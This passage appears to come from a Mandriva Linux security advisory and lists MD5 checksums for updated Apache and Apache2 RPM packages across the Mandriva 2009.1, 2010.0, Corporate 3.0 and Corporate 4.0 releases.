 ad6fc82908c310d1be2ccdf4fb4d3ce3  2009.1/x86_64/apache-mpm-worker-2.2.11-10.6mdv2009.1.x86_64.rpm
 4a84ec62874c0c91d36819c81d1e0767  2009.1/x86_64/apache-source-2.2.11-10.6mdv2009.1.x86_64.rpm 
 a3d3eace4fc86e7ec9c1e8184d40e8d3  2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 d1809e51bc2dbb3a655246e85a95caf0  2010.0/i586/apache-base-2.2.14-1.1mdv2010.0.i586.rpm
 a78c15bf2b5e5a75eb7fc8eaa725344a  2010.0/i586/apache-devel-2.2.14-1.1mdv2010.0.i586.rpm
 4f464ba836031170feb0b4e661b34419  2010.0/i586/apache-htcacheclean-2.2.14-1.1mdv2010.0.i586.rpm
 0f75c700952a8384685c8d9e9f31b065  2010.0/i586/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.i586.rpm
 7d98bab9cd58fae7dc2eb8e7651276de  2010.0/i586/apache-mod_cache-2.2.14-1.1mdv2010.0.i586.rpm
 5e627fd34f349b2bd2a89e4c9e1f6746  2010.0/i586/apache-mod_dav-2.2.14-1.1mdv2010.0.i586.rpm
 fdf016ba91662793af3b5a18b004f6ac  2010.0/i586/apache-mod_dbd-2.2.14-1.1mdv2010.0.i586.rpm
 1088dbea44ae4db977b77198cd564125  2010.0/i586/apache-mod_deflate-2.2.14-1.1mdv2010.0.i586.rpm
 c553147aa3bea5f1e455a71fffdfb6bc  2010.0/i586/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.i586.rpm
 350885b059fb57ed93eb6e7d4f197d3f  2010.0/i586/apache-mod_file_cache-2.2.14-1.1mdv2010.0.i586.rpm
 83566cb97d796f0ddece9aa90a1ac81a  2010.0/i586/apache-mod_ldap-2.2.14-1.1mdv2010.0.i586.rpm
 3dd06c6346f120722de6d78cf9372079  2010.0/i586/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.i586.rpm
 2e6a0c297c4b443c5327567aa1c7c243  2010.0/i586/apache-mod_proxy-2.2.14-1.1mdv2010.0.i586.rpm
 40771fe728d628bfbfa2287d6f4c3155  2010.0/i586/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.i586.rpm
 259eb6f83c314c314bd9fb08f90743aa  2010.0/i586/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.i586.rpm
 4592b29ddde103e442b0a55486d6b9c2  2010.0/i586/apache-mod_ssl-2.2.14-1.1mdv2010.0.i586.rpm
 829f927a019c51e53edb1a4d2e98c6b4  2010.0/i586/apache-modules-2.2.14-1.1mdv2010.0.i586.rpm
 a9a5e28bc8dfb9d4589260d22afb846d  2010.0/i586/apache-mod_userdir-2.2.14-1.1mdv2010.0.i586.rpm
 e83d855a1717bdcb5b90471136f43ab2  2010.0/i586/apache-mpm-event-2.2.14-1.1mdv2010.0.i586.rpm
 535262f8fa474ae09f5587a8f690fe06  2010.0/i586/apache-mpm-itk-2.2.14-1.1mdv2010.0.i586.rpm
 acfb57b5b632cf0c559e583c7eba5698  2010.0/i586/apache-mpm-peruser-2.2.14-1.1mdv2010.0.i586.rpm
 2b096ca235d6a5965bd9e93451f9465c  2010.0/i586/apache-mpm-prefork-2.2.14-1.1mdv2010.0.i586.rpm
 4799ce79cbaccfdeb627494d10e75d70  2010.0/i586/apache-mpm-worker-2.2.14-1.1mdv2010.0.i586.rpm
 73047099f8f8c6c73eb0bbf912dc242c  2010.0/i586/apache-source-2.2.14-1.1mdv2010.0.i586.rpm 
 0dd58d7f80879f76093cfa19db00cacd  2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 17403e4a16b7588d58353351f39b5123  2010.0/x86_64/apache-base-2.2.14-1.1mdv2010.0.x86_64.rpm
 efbd8d015a1f022995d50aef8fccf514  2010.0/x86_64/apache-devel-2.2.14-1.1mdv2010.0.x86_64.rpm
 06f5ab103a5f763361a76ad85f38006d  2010.0/x86_64/apache-htcacheclean-2.2.14-1.1mdv2010.0.x86_64.rpm
 cef5c18678dbbdb2a995a2743923b652  2010.0/x86_64/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm
 6f94396641d7461ed7ac6dee4728a16d  2010.0/x86_64/apache-mod_cache-2.2.14-1.1mdv2010.0.x86_64.rpm
 d82b85275deb95aa088f2be367720974  2010.0/x86_64/apache-mod_dav-2.2.14-1.1mdv2010.0.x86_64.rpm
 ff677c2a96d9827c57de63024bf3b325  2010.0/x86_64/apache-mod_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm
 68c028d2759cb4bbfa92be5124c9e82a  2010.0/x86_64/apache-mod_deflate-2.2.14-1.1mdv2010.0.x86_64.rpm
 8e83040fd096abe63b523aafc0cd330f  2010.0/x86_64/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.x86_64.rpm
 aedf657533f6ef8b87755e33992ae547  2010.0/x86_64/apache-mod_file_cache-2.2.14-1.1mdv2010.0.x86_64.rpm
 70b9c3abf78961d732a64c3c0ef777d8  2010.0/x86_64/apache-mod_ldap-2.2.14-1.1mdv2010.0.x86_64.rpm
 9f5355474bfa4e92b625f8a151f7ad57  2010.0/x86_64/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.x86_64.rpm
 9c88234150d3538ac4b12c91d81fafdd  2010.0/x86_64/apache-mod_proxy-2.2.14-1.1mdv2010.0.x86_64.rpm
 7b131710288ef094929d4c7c3345e38f  2010.0/x86_64/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.x86_64.rpm
 11703b4164fac113e64dd5015be06cda  2010.0/x86_64/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.x86_64.rpm
 c11b40d2a2bae457207708ba7f60f6d5  2010.0/x86_64/apache-mod_ssl-2.2.14-1.1mdv2010.0.x86_64.rpm
 b4e568b230723eb8e9f4361c9023f06d  2010.0/x86_64/apache-modules-2.2.14-1.1mdv2010.0.x86_64.rpm
 e814f74a0199f669684c00cd4f73e5f5  2010.0/x86_64/apache-mod_userdir-2.2.14-1.1mdv2010.0.x86_64.rpm
 68bf641f60ef5972aa965f82ccbd2d2b  2010.0/x86_64/apache-mpm-event-2.2.14-1.1mdv2010.0.x86_64.rpm
 e7a9752d15eba26d1ac072b2e25ee559  2010.0/x86_64/apache-mpm-itk-2.2.14-1.1mdv2010.0.x86_64.rpm
 f6a733d163fc33345c5bd2e2104f4337  2010.0/x86_64/apache-mpm-peruser-2.2.14-1.1mdv2010.0.x86_64.rpm
 ccdcfa4fa39683a78a43f0115cb5e299  2010.0/x86_64/apache-mpm-prefork-2.2.14-1.1mdv2010.0.x86_64.rpm
 d94ec40a8272788ae9636c444f354c65  2010.0/x86_64/apache-mpm-worker-2.2.14-1.1mdv2010.0.x86_64.rpm
 714f9b5de7bcc482988ceac41d186236  2010.0/x86_64/apache-source-2.2.14-1.1mdv2010.0.x86_64.rpm 
 0dd58d7f80879f76093cfa19db00cacd  2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm

 Corporate 3.0:
 445117a109396af9413dca2a69f01a0a  corporate/3.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm
 30176ca39c3d65c2e50cf4c4d192dfa2  corporate/3.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm
 96b47f57ba9fb077da6cf27bc21e7a76  corporate/3.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm
 ee2e1c41ed579312e9f6365af1f475b3  corporate/3.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm
 06ce15a998c23ec835a81a061455249a  corporate/3.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm
 7abe5081d5d991b09a8484f41aeadba5  corporate/3.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm
 73516b134aed9853067ab93fe830513b  corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm
 0d98687a38a7a9806030d8514fe9e0bc  corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm
 8be5990f31ccf58eb110efb0c45487b7  corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm
 4ddd2e15e616715ea577e1b1b010da39  corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm
 bccdb965684cd1e24d054f7febc096ff  corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm
 345e5038a9390a07a62d39da825df65d  corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm
 a3e4dc57677b0728ae7c87a4a0cd4e68  corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm
 c5c5fde933d0a30744a18e8fbdc677f5  corporate/3.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm
 da00919dd82d8db9b7fb4a63c6b44965  corporate/3.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm
 036643a921387b88380a3f913865ec5f  corporate/3.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm 
 63e2249a390c150ab253ad9b22c3be11  corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 8ed8407694197319443b1dc1400d41c6  corporate/3.0/x86_64/apache2-2.0.48-6.24.C30mdk.x86_64.rpm
 6a1163108c43c55a8a55619493d641a0  corporate/3.0/x86_64/apache2-common-2.0.48-6.24.C30mdk.x86_64.rpm
 58151e6d42ced2607936d1b1c213dd32  corporate/3.0/x86_64/apache2-devel-2.0.48-6.24.C30mdk.x86_64.rpm
 99a3c31922d94d203af88a2563d13084  corporate/3.0/x86_64/apache2-manual-2.0.48-6.24.C30mdk.x86_64.rpm
 b08953bf8a87cbee0241d847e6cbb6a6  corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.24.C30mdk.x86_64.rpm
 1a5ad78b7315a7a6bfa05db7438c6eda  corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.24.C30mdk.x86_64.rpm
 a636014239d93572e2a91ee866ae3f82  corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.24.C30mdk.x86_64.rpm
 9adcf4378314a767e696654b3331b457  corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.x86_64.rpm
 49ef3af0b106e5eec7fe3005fb81b5d4  corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.24.C30mdk.x86_64.rpm
 958dffea2073203c81f20b9f0bea9482  corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.24.C30mdk.x86_64.rpm
 a9e65314e2fd6e892509e0da10f6eeb0  corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.x86_64.rpm
 1868d43b584b33eecf05d34e9cf3fb4c  corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.24.C30mdk.x86_64.rpm
 5be056de8b78c46a8c92215dbd5f227e  corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.24.C30mdk.x86_64.rpm
 e7afdce1e4b9e73f8798a7ac1651b896  corporate/3.0/x86_64/apache2-modules-2.0.48-6.24.C30mdk.x86_64.rpm
 af0468764dd4b41a504a767bc83cb6e0  corporate/3.0/x86_64/apache2-source-2.0.48-6.24.C30mdk.x86_64.rpm
 ca4b564d5e3bf167a6aa1f9ed2b4d87a  corporate/3.0/x86_64/lib64apr0-2.0.48-6.24.C30mdk.x86_64.rpm 
 63e2249a390c150ab253ad9b22c3be11  corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm

 Corporate 4.0:
 d07e89c7290315f70eac762e5b18c87a  corporate/4.0/i586/apache-base-2.2.3-1.9.20060mlcs4.i586.rpm
 024922fdd74e02987c974574bee16142  corporate/4.0/i586/apache-devel-2.2.3-1.9.20060mlcs4.i586.rpm
 a6f56a8099acac3eed1a5795b319894b  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.9.20060mlcs4.i586.rpm
 04013648d7252ff8280b8a0bd0bc54d8  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.i586.rpm
 bbe1270f753acfcadd609f0f5271ab59  corporate/4.0/i586/apache-mod_cache-2.2.3-1.9.20060mlcs4.i586.rpm
 8e39e175d01ba601cc8f4a89aa0aafe8  corporate/4.0/i586/apache-mod_dav-2.2.3-1.9.20060mlcs4.i586.rpm
 c624f40ca8a6e17396aa6c8b0e87316a  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.9.20060mlcs4.i586.rpm
 48507ca50019f15557211e7208917442  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.9.20060mlcs4.i586.rpm
 0c35cb63bff80d6a374dc1bb638c293d  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.i586.rpm
 e54a0df2e42964146494087a713c88d7  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.i586.rpm
 6671114f02a3f484499ea8c374e8490a  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.9.20060mlcs4.i586.rpm
 9a9c1bea5eec317c217d696d72569e6e  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.i586.rpm
 23f6363a3bf7833d2b96a3297e4a564f  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.9.20060mlcs4.i586.rpm
 3b9415f481e7a22a5198028ae959a5dd  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.i586.rpm
 86554d7f517fce317019f67fd75259ad  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.9.20060mlcs4.i586.rpm
 e3e5dc6310d7bf1d4d2044b1725a9d48  corporate/4.0/i586/apache-modules-2.2.3-1.9.20060mlcs4.i586.rpm
 2fd54535f742c7717965f9724d2d01f0  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.9.20060mlcs4.i586.rpm
 632c40b46876d9b703ad23eced906f78  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.i586.rpm
 e30e11806815fb176b3c803c5019f177  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.9.20060mlcs4.i586.rpm
 b5a512cf0d830276bee061adc68865c6  corporate/4.0/i586/apache-source-2.2.3-1.9.20060mlcs4.i586.rpm 
 130effba39f8a908caf0cd50bc21032b  corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 ecc2a3bd8e40259f3abe8b919be7c19e  corporate/4.0/x86_64/apache-base-2.2.3-1.9.20060mlcs4.x86_64.rpm
 15fbe828c013d9e6f057429316e52b4f  corporate/4.0/x86_64/apache-devel-2.2.3-1.9.20060mlcs4.x86_64.rpm
 35200d719d37cce3340a3340ed8844f0  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.9.20060mlcs4.x86_64.rpm
 9557096c0aaa1654b01a702aaec9cfdc  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm
 360db7ff5aeb5fb4d50965ff46cf33c2  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm
 fc3466f85615fe8c101c378cf708925e  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.9.20060mlcs4.x86_64.rpm
 36c78f40285a12e4435cdc3f50760e98  corporate/4.0/x86_64/apa